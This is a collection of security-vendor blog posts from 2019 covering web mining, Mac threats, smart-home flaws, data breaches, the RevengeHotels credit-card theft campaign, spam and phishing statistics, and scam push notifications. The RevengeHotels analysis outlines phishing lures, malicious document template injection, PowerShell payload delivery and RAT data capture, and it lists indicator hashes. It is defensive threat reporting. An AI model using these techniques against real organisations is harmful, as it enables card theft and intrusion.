Ransomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the Yatron and FortuneCrypt malware. If you ever face a situation where a ransomware Trojan has encrypted your data, and you don’t have a backup, it’s always worth checking the No More Ransom site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs here and here.

The impact of web mining

Malicious miners are programs designed to hijack the victim’s CPU in order to mine crypto-currencies. The business model is simple: infect the computer, use the processing power of their CPU or GPU to generate coins and earn real-world money through legal exchanges and transactions. It’s not obvious to the victim that they are infected – most people seldom use most of their computer’s processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there’s also another model – using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.

The total power saving can be calculated using the formula ·N, where is the average value of the increase in power consumption of the victim’s device during the web mining process, and N is the number of blocked attempts according to KSN (Kaspersky Security Network) data for 2018. This figure is equal to 18.8±11.8 gigawatts (GW) – twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula ‘·N·t’, where ‘t’ is the average time that web miners would have been working had they not been blocked by our products. Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to €250,000 for residents in Europe.

You can read our report here.

Mac OS threat landscape

Some people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.

Our database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category – these threats are easier to create, offering a better return on investment for cybercriminals.

The number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years – by around 30-40% each year. In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million – already an increase of 9% over the previous year.

You can read our report on the current Mac OS threat landscape here.

Smart home vulnerabilities

One of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the Kaspersky ICS CERT team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter – the Fibaro hub used the patched version.

Our researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. Among other things, this backup contains a database file with a lot of personal information, including the house’s location, geo-location data from the owner’s smartphone, the email address used to register with Fibaro, information about smart devices in the owner’s home and even the owner’s password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story here.

Security of smart buildings

This quarter we also looked at the security of automation systems in buildings – sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.

Most of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building’s automation system.

Smart cars and connected devices

Kaspersky has investigated smart car security several times in recent years (here and here), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn’t just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience – from car scanners to tuning gadgets. In a recent report, we reviewed a number of automotive connected devices and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.

We found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It’s also due to the vigilance of vendors. However, as we move towards a more and more connected future, it’s important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim’s car or spy on an entire car fleet.

We continue to develop KasperskyOS, to help customers secure connected systems – including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.

If you’re considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it’s possible to apply security updates to it. Don’t automatically buy the most recently released product, since it might contain a security flaw that hasn’t yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the ‘mobile dimension’ of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.

Personal data theft

We’ve become used to a steady stream of reports in the news about data breaches. Recent examples include the theft of 23,205,290 email addresses together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. Worryingly, the hack was reported by Have I Been Pwned – CafePress didn’t notify its customers until some months after the breach had occurred.

In August, two Israeli researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.

Facebook has faced criticism on several occasions for failing to handle customers’ data properly. In the latest of a long list of incidents, hundreds of millions of phone numbers linked to Facebook accounts were found online on a server that wasn’t protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.

On September 12, mobile gaming company Zynga reported that some player account data may have been accessed illegally by ‘outside hackers’. Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of Words With Friends, as well as data from Draw Something and the discontinued game OMGPOP, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it’s worrying that passwords were stored in cleartext.

Consumers have no direct control over the security of the personal data they disclose to online providers. However, we can limit the damage of a security breach at an online provider by ensuring that they create passwords that are unique and hard to guess, or use a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.

It’s also worth bearing in mind that hacking the server of an online provider isn’t the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer’s computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers here.

RevengeHotels: cybercrime targeting hotel front desks worldwide

28 Listopad, 2019 - 11:00

RevengeHotels is a targeted cybercrime malware campaign against hotels, hostels, hospitality and tourism companies, mainly, but not exclusively, located in Brazil. We have confirmed more than 20 hotels that are victims of the group, located in eight states in Brazil, but also in other countries such as Argentina, Bolivia, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey. The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems, as well as credit card data received from popular online travel agencies (OTAs) such as Booking.com.

The main attack vector is via email with crafted Word, Excel or PDF documents attached. Some of them exploit CVE-2017-0199, loading it using VBS and PowerShell scripts and then installing customized versions of RevengeRAT, NjRAT, NanoCoreRAT, 888 RAT and other custom malware such as ProCC in the victim’s machine. The group has been active since 2015, but increased its attacks in 2019.

In our research, we were also able to track two groups targeting the hospitality sector, using separate but similar infrastructure, tools and techniques. PaloAlto has already written about one of them. We named the first group RevengeHotels, and the second ProCC. These groups use a lot of social engineering in their attacks, asking for a quote from what appears to be a government entity or private company wanting to make a reservation for a large number of people. Their infrastructure also relies on the use of dynamic DNS services pointing to commercial hosting and self-hosted servers. They also sell credentials from the affected systems, allowing other cybercriminals to have remote access to hotel front desks infected by the campaign.

We monitored the activities of these groups and the new malware they are creating for over a year. With a high degree of confidence, we can confirm that at least two distinct groups are focused on attacking this sector; there is also a third group, though it is unclear if its focus is solely on this sector or if carries out other types of attacks.

Not the quotation you’re expecting

One of the tactics used in operations by these groups is highly targeted spear-phishing messages. They register typo-squatting domains, impersonating legitimate companies. The emails are well written, with an abundance of detail. They explain why the company has chosen to book that particular hotel. By checking the sender information, it’s possible to determine whether the company actually exists. However, there is a small difference between the domain used to send the email and the real one.

An email sent to a hotel supposedly from an attorney’s office

This spear-phishing message, written in Portuguese, has a malicious file attached misusing the name of a real attorney office, while the domain sender of the message was registered one day before, using a typo-squatting domain. The group goes further in its social engineering effort: to convince the hotel personnel about the legitimacy of their request, a copy of the National Registry of Legal Entities card (CNPJ) is attached to the quotation.

The attached file, Reserva Advogados Associados.docx (Attorneys Associates Reservation.docx), is a malicious Word file that drops a remote OLE object via template injection to execute macro code. The macro code inside the remote OLE document contains PowerShell commands that download and execute the final payload.

PowerShell commands executed by the embedded macro

In the RevengeHotels campaign, the downloaded files are .NET binaries protected with the Yoda Obfuscator. After unpacking them, the code is recognizable as the commercial RAT RevengeRAT. An additional module written by the group called ScreenBooking is used to capture credit card data. It monitors whether the user is browsing the web page. In the initial versions, back in 2016, the downloaded files from RevengeHotels campaigns were divided into two modules: a backdoor and a module to capture screenshots. Recently we noticed that these modules had been merged into a single backdoor module able to collect data from clipboard and capture screenshots.

In this example, the webpage that the attacker is monitoring is booking.com (more specifically, the page containing the card details). The code is specifically looking for data in Portuguese and English, allowing the attackers to steal credit card data from web pages written in these languages.

Title searched by the malware in order to capture the screen contents

In the ProCC campaigns, the downloaded files are Delphi binaries. The backdoor installed in the machine is more customized than that used by RevengeHotels: it’s developed from scratch and is able to collect data from the clipboard and printer spooler, and capture screenshots. Because the personnel in charge of confirming reservations usually need to pull credit card data from OTA websites, it’s possible to collect card numbers by monitoring the clipboard and the documents sent to the printer.

Screenshot is captured when the user copies something to the clipboard or makes a print request

A bad guy’s concierge

According to the relevant underground forums and messaging groups, these criminals also infect front desk machines in order to capture credentials from the hotel administration software; they can then steal credit card details from it too. Some criminals also sell remote access to these systems, acting as a concierge for other cybercriminals by giving them permanent access to steal new data by themselves.

Access to hotel booking systems containing credit card details is sold by criminals as a service

Some Brazilian criminals tout credit card data extracted from a hotel’s system as high quality and reliable because it was extracted from a trusted source, i.e., a hotel administration system.

Message sent to an underground channel selling data extracted from hotel systems

Guests and victims

The majority of the victims are associated with the hospitality sector. Based on the routines used, we estimate that this attack has a global reach. However, based on our telemetry data, we can only confirm victims in the following countries:

Victims confirmed in Argentina, Bolivia, Brazil, Chile, Costa Rica, France, Italy, Mexico, Portugal, Spain, Thailand and Turkey

Based on data extracted from Bit.ly statistics, we can see that potential victims from many other countries have at least accessed the malicious link. This data suggests that the number of countries with potential victims is higher than our telemetry has registered.

Victims per country based on data from a malicious Bit.ly link from the RevengeHotels campaign

A safe stay

RevengeHotels is a campaign that has been active since at least 2015, revealing different groups using traditional RAT malware to infect businesses in the hospitality sector. While there is a marked interest in Brazilian victims, our telemetry shows that their reach has extended to other countries in Latin America and beyond.

The use of spear-phishing emails, malicious documents and RAT malware is yielding significant results for at least two groups we have identified in this campaign. Other threat actors may also be part of this wave of attacks, though there is no confirmation at the current time.

If you want to be a savvy and safe traveler, it’s highly recommended to use a virtual payment card for reservations made via OTAs, as these cards normally expire after one charge. While paying for your reservation or checking out at a hotel, it’s a good idea to use a virtual wallet such as Apple Pay, Google Pay, etc. If this is not possible, use a secondary or less important credit card, as you never know if the system at the hotel is clean, even if the rooms are…

All Kaspersky products detect this threat as:

  • HEUR:Backdoor.MSIL.Revenge.gen
  • HEUR:Trojan-Downloader.MSIL.RevengeHotels.gen
  • HEUR:Trojan.MSIL.RevengeHotels.gen
  • HEUR:Trojan.Win32.RevengeHotels.gen
  • HEUR:Trojan.Script.RevengeHotels.gen
Indicators of compromise (IoCs) Reference hashes:
  • 74440d5d0e6ae9b9a03d06dd61718f66
  • e675bdf6557350a02f15c14f386fcc47
  • df632e25c32e8f8ad75ed3c50dd1cd47
  • a089efd7dd9180f9b726594bb6cf81ae
  • 81701c891a1766c51c74bcfaf285854b

For a full list of IoCs as well as the YARA rules and intelligence report for this campaign, please visit the Kaspersky Threat Intelligence Portal: https://tip.kaspersky.com/

Spam and phishing in Q3 2019

26 Listopad, 2019 - 11:00

Quarterly highlights Amazon Prime

In Q3, we registered numerous scam mailings related to Amazon Prime. Most of the phishing emails with a link to a fake Amazon login page offered new prices or rewards for buying things, or reported problems with membership, etc. Against the backdrop of September’s Prime Day sale, such messages were plausible.

Scammers also used another fraudulent scheme: An email informed victims that their request to cancel Amazon Prime had been accepted, but if they had changed their mind, they should call the number in the message. Fearing their accounts may have been hacked, victims phoned the number — this was either premium-rate and expensive, or, worse, during the call the scammers tricked them into revealing confidential data.

Scammers collect photos of documents and selfies

This quarter we detected a surge in fraud related to stealing photos of documents and selfies with them (often required for registration or identification purposes). In phishing emails seemingly from payment systems and banks, users were asked under various pretexts to confirm their identity by going to a special page and uploading a selfie with an ID document. The fake sites looked quite believable, and provided a list of necessary documents with format requirements, links to privacy policy, user agreement, etc.

Some scammers even managed without a fake website. For instance, in summer Italian users were hit by a spam attack involving emails about a smartphone giveaway. To receive the prize, hopefuls had to send a photograph of an ID document and a selfie to the specified email address. To encourage victims to respond, the scammers stated that the offer would soon expire.

To obtain copies of documents, scammers also sent fake Facebook messages in which recipients were informed that access to their accounts had been restricted due to complaints about the content of some posts. To prevent their account from being deleted, they were instructed to send a photo or scan of a driving license and other ID documents with a selfie, plus medical insurance details.

YouTube and Instagram

Scammers continue to exploit traditional schemes on new platforms, and Q3 was a bumper quarter in this regard. For instance, YouTube ads appeared offering the viewer the chance to earn a lot of quick and easy money. The video explained to users that they had to take a survey and provide personal details, after which they would receive a payout or a gift from a large company, etc. To add credibility, fake reviews from supposedly “satisfied customers” were posted under the video. What’s more, the enthusiastic bot-generated comments did not appear all in one go, but were added gradually to look like a live stream.

All the user had to do was follow the link under the video and then follow the steps in the video instructions. Sure, to receive the handout, a small “commission fee” or payment to “confirm the account” was required.

Similar schemes did the rounds on Instagram. Advertising posts in the name of various celebrities (fake accounts are easily distinguished from real ones by the absence of a blue tick) were often used to lure fans with prize draws or rewards for completing a paid survey. As with the YouTube videos, there were plenty of fake glowing comments under such posts. Given that such giveaways by stars are not uncommon, inattentive users could swallow the bait.

Back to school

In Q3, we registered a series of attacks related in one way or another to education. Phishers harvested usernames and passwords from the personal accounts of students and lecturers using fake pages mimicking university login pages.

The scammers were looking not for financial data, but for university research papers, as well as any personal information that might be kept on the servers. Data of this kind is in high demand on the darknet market. Even data that seems useless at first can be used by cybercriminals to prepare a targeted attack.

One way to create phishing pages is to hack into legitimate resources and post fraudulent content on them. In Q3, phishers hacked school websites and created fake pages on them to mimic login forms for commonly used resources.

Scammers also tried to steal usernames and passwords for the mail servers of educational service providers. To do so, they mailed out phishing messages disguised as support service notifications asking recipients to confirm that the mail account belonged to them.

Apple product launch

In September, Apple unveiled its latest round of products, and as usual the launch was followed by fans and scammers alike — we detected phishing emails in mail traffic aimed at stealing Apple ID authentication data.

Scammers also harvested users’ personal data by sending spam messages offering free testing of new releases.

The number of attempts to open fake websites mentioning the Apple brand rose in the runup to the unveiling of the new product line and peaked on the actual day itself:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of attempts to open Apple-related phishing pages, September 2019 (download)

Attacks on pay TV users

To watch TV or record live broadcasts in the UK, a license fee is payable. This was exploited by spammers who sent out masses of fake license expiry/renewal messages. What’s more, they often used standard templates saying that the license could not be renewed because the bank had declined the payment.

The recipient was then asked to verify (or update) their personal and/or payment details by clicking on a link pointing to a fake data entry and payment form.

Spam through website feedback forms

The website of any large company generally has one or even several feedback forms. These can be used to ask questions, express wishes, sign up for company events, or subscribe to newsletters. But messages sent via such forms often come not only from clients or interested visitors, but from scammers too.

There is nothing new about this phenomenon per se, but it is interesting to observe how the mechanism for sending spam through forms has evolved. If previously spammers targeted company mailboxes linked to feedback forms, now fraudsters use them to send spam to people on the outside.

This is possible because some companies do not pay due attention to website security, allowing attackers to bypass simple CAPTCHA tests with the aid of scripts and to register users en masse using feedback forms. Another oversight is that the username field, for example, accepts any text or link. As a result, the victim whose mailing address was used receives a legitimate confirmation of registration email, but containing a message from the scammers. The company itself does not receive any message.

Such spam started to surge several years ago, and has recently become even more popular — in Q3 services for delivering advertising messages through feedback forms began to be advertised in spam mailings.

Attacks on corporate email

Last quarter, we observed a major spam campaign in which scammers sent emails pretending to be voicemail notifications. To listen to the supposed message, the recipient was invited to click or tap the (phishing) link that pointed to a website mimicking the login page of a popular Microsoft service. It was a page for signing either into Outlook or directly into a Microsoft account.

The attack was aimed specifically at corporate mail users, since various business software products allow the exchange of voice messages and inform users of new ones via email.

It is worth noting that the number of spam attacks aimed specifically at the corporate sector has increased significantly of late. Cybercriminals are after access to employees’ email.

Another common trick is to report that incoming emails are stuck in the delivery queue. To receive these supposedly undeliverable messages, the victim is prompted to follow a link and enter their corporate account credentials on another fake login page, from where they go directly to the cybercriminals. Last quarter, our products blocked many large-scale spam campaigns under the guise of such notifications.

Statistics: spam Proportion of spam in mail traffic

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of spam in global mail traffic, Q2 and Q3 2019 (download)

In Q3 2019, the largest share of spam was recorded in August (57.78%). The average percentage of spam in global mail traffic was 56.26%, down 1.38 p.p. against the previous reporting period.

Sources of spam by country

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Sources of spam by country, Q3 2019 (download)

The TOP 5 spam-source countries remain the same as last quarter, only their percentage shares are slightly different. China is in first place (20.43%), followed by the US (13.37%) and Russia (5.60%). Fourth position goes to Brazil (5.14%) and fifth to France (3.35%). Germany took sixth place (2.95%), followed — with a gap of less than 0.5 p.p. — by India (2.65%), Turkey (2.42%), Singapore (2.24%), and Vietnam (2.15%).

Spam email size

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Spam email size, Q2 and Q3 2019 (download)

In Q3 2019, the share of very small emails (up to 2 KB) in spam decreased by 4.38 p.p. to 82.93%. The proportion of emails sized 5-10 KB grew slightly (by 1.52 p.p.) against the previous quarter to 3.79%.

Meanwhile, the share of 10-20 KB emails climbed by 0.26 p.p. to 2.24%. As for the number of 20-50 KB emails, their share changed more significantly, increasing by 2.64 p.p. (up to 4.74%) compared with the previous reporting period.

Malicious attachments in email

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of Mail Anti-Virus triggerings, Q2 2019 – Q3 2019 (download)

In Q3 2019, our security solutions detected a total of 48,089,352 malicious email attachments, which is almost five million more than in Q2. July was the most active month with 17 million Mail Anti-Virus triggerings, while August was the “calmest” — with two million fewer.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malicious attachments in mail traffic, Q3 2019 (download)

In Q3, first place by prevalence in mail traffic went to the Office malware Exploit.MSOffice.CVE-2017-11882.gen (7.13%); in second place was the Worm.Win32.WBVB.vam worm (4.13%), and in third was another malware aimed at Microsoft Office users, Trojan.MSOffice.SAgent.gen (2.24%).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malware families, Q3 2019 (download) (download)

As for malware families, the Backdoor.Win32.Androm family (7.49%) claimed first place.

In second place are Microsoft Office exploits from the Exploit.MSOffice.CVE-2017-11882.gen family (7.20%). And in third is Worm.Win32.WBVB.vam (4.60%).

Countries targeted by malicious mailings

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of Mail Anti-Virus triggerings by country, Q3 2019 (download)

First place by number of Mail Anti-Virus triggerings in Q3 2019 was retained by Germany. Its score increased by 0.31 p.p. to 10.36%. Vietnam also remained in the TOP 3, rising to second position (5.92%), and Brazil came in third just a tiny fraction behind.

Statistics: phishing

In Q3 2019, the Anti-Phishing system prevented 105,220,094 attempts to direct users to scam websites. The percentage of unique attacked users was 11.28% of the total number of users of Kaspersky products worldwide.

Attack geography

The country with the largest share of users attacked by phishers in Q3 2019 was Venezuela (30.96%), which took second place in the previous quarter and has since added 5.29 p.p.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of phishing attacks, Q3 2019 (download)

Having lost 3.53 p.p., Greece ranked second (22.67%). Third place, as in the last quarter, went to Brazil (19.70%).

Country %* Venezuela 30.96 Greece 22.67 Brazil 19.70 Honduras 17.58 Guatemala 16.80 Panama 16.70 Australia 16.18 Chile 15.98 Ecuador 15.64 Portugal 15.61

* Share of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky users in the country

Organizations under attack

The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

For the first time this year, the share of attacks on organizations in the Global Internet Portals category (23.81%) exceeded the share of attacks on credit organizations (22.46%). Social networks (20.48%) took third place, adding 11.40 p.p. to its share.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of organizations subjected to phishing attacks by category, Q3 2019. (download)

In addition, the TOP 10 said goodbye to the Government and Taxes category.

Its place was taken by the Financial Services category, which unites companies providing services in the field of finance that are not included in the Banks or Payment Systems categories, which cover providers of insurance, leasing, brokerage, and other services.


The average share of spam in global mail traffic (56.26%) this quarter decreased by 1.38 p.p. against the previous reporting period, while the number of attempted redirects to phishing pages compared to Q2 2019 fell by 25 million to just over 105 million.

Top in this quarter’s list of spam-source countries is China, with a share of 20.43%. Our security solutions blocked 48,089,352 malicious mail attachments, while Backdoor.Win32.Androm became the most common mail-based malware family — its share of mail traffic amounted to 7.49%.

Unwanted notifications in browser

25 Listopad, 2019 - 11:46

When, back in 2015, push notifications were just appearing in browsers, very few people wondered how this tool would be used in the future: once a useful technology made to keep regular readers informed about updates, today it is often used to shell website visitors with unsolicited ads. To achieve that, users are hoaxed into subscribing to notifications, for example, by passing subscription consent off as some other action. The victim ends up subscribed to ad deliveries, while at the same time quite unable to get rid of the annoying messages, being unaware of their source or origin.

Examples of unsolicited push notifications

Other than ads, downright scam notifications may also be delivered, such as about lottery wins, or offers of money in exchange for completing a survey. All such proposals are usually phishing attacks seeking to coax users to part with their money. We have repeatedly anatomized such cases in our quarterly spam and phishing reports.

From January 1 through September 30, 2019, Kaspersky Lab products have blocked ad and scam notifications sign up and demonstration attempts on the devices of more than 14 million unique users all over the world. We have observed the highest share of users (of the total number of our product users) hit by unsolicited subscriptions in Algeria (27.2%), Belarus (24.1%), Nepal (23.7%), Kazakhstan (23.6%) and the Philippines (22.2%).

We have also registered an upward trend in the spread of ad and scam subscriptions. Since the turn of the year, the number of users hit by this problem has continued to grow:

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of users hit by unwanted subscriptions, January – September 2019 (download)

Getting the user subscribed

To make users sign up for notifications they don’t need, scammers try to pass the confirmation window off as something else. For example, as CAPTCHA:

In other instances, clicking “Allow” button is ostensibly needed to play back a video or begin downloading a file:

Sometimes the webpage content remains blocked until the user has agreed to sign up for notifications:

Often the victim agrees to receive promotional notifications having been misled to believe that he or she is subscribing to updates on a website of interest. In the case below, a subscription like that is offered by a website ostensibly dedicated to Android devices:

Of particular note are websites touting subscriptions on behalf of popular resources: these are in fact phishing copies of popular websites – of only slightly different appearance and with domain names that look like the real ones.

This page has nothing to do with the company’s official website, it just refers to it

Another imitation

Sometimes scammers simply modify the script in such a way as to make the buttons swap their places in the subscription request dialog box; if used to clicking on “Block” in the right hand side of the box, chances are this time the user will hit “Allow”.

If you look up the earlier screenshots, you may notice that in this dialog box the buttons are placed the other way around

How do subscriptions work?

For the user to begin receiving notifications, his or her consent is required. Some requests for consent are illustrated above. These are activated using scripts that come with the webpage.

Examples of webpages featuring links to scripts activating subscription request dialog boxes (marked red)

The main purpose of these scripts is to identify the presence of the functions necessary to display notifications. Such as the ServiceWorker script, which operates as a service and allows to push notifications even when the browser is off. The sign-up scripts working with advertisement and scam subscriptions are usually strongly obfuscated. But their key elements are discernable, nevertheless.

Obfuscated functions of a sign-up script

A clearer portion of a sign-up script code with some obfuscation elements

If the user has consented to notifications, the script sends to the notification host server a unique user ID, which will later help to determine who exactly is to receive the news. After consent is secured, the server stores the user’s ID, while a link to the website which has signed the user up for notifications (the page on which the “Allow” button has been clicked) is saved in browser settings.

Websites authorized to deliver push notifications in browser settings. The box highlights ad subscriptions in which the content of notifications is unrelated to the original content of the website

So, the user has consented to notifications, the subscription server has stored the user’s ID, and the browser has memorized the webpage which had provided consent for subscription. Now the server can deliver a push message to the user by sending it via the subscription service in JSON format.

Example of notification message in JSON format

The message contains text, an image (if needed), a link to the destination website, and the user ID. The notification itself will feature a link to the website which had signed the user up, but not the webpage to which the user will be redirected. Very often this misleads the user, especially if the sign-up website uses a domain name made to look like the legitimate one.

Example of notification misleading the user with a link to a sign-up website

What’s the upshot

In the most harmless case, the victim will simply receive push ads. Interestingly, their content may vary depending on the user’s location. For example, if in Singapore, country-relevant content will be displayed:

By the way, the example above shows the “success story” advertisement, quite popular ad category in the last couple of years. Push notifications often deliver links to stories about how to get rich or soar to success in the context of sensitive social topics. For example, “how to get rich in a particular country” or “how to become a successful manager if you are a woman”. Most such “tips” advertise success trainings and workshops or various mascots.

Worthy of separate mention are the push messages disguised as system notifications coming from the OS or applications: the victim may be suggested to click a button to deactivate push ads or to extend the anti-virus license.

Computer virus infection alert notifications are among the most unpleasant ones. These usually redirect users to pre-designed pages made to appear like the official Microsoft website or resembling some OS Windows components, e.g., Windows Defender:

This trick is often used to distribute various “PC cleaning” utilities. And while some of them do perform the stated functions to a greater or lesser extent, others simply try to milk the user out of as much money as they can – either for the “work” done or for upgrade to a better equipped version.

Avoiding unsolicited subscriptions

To avoid receiving annoying notifications or scam ads, follow a few simple recommendations:

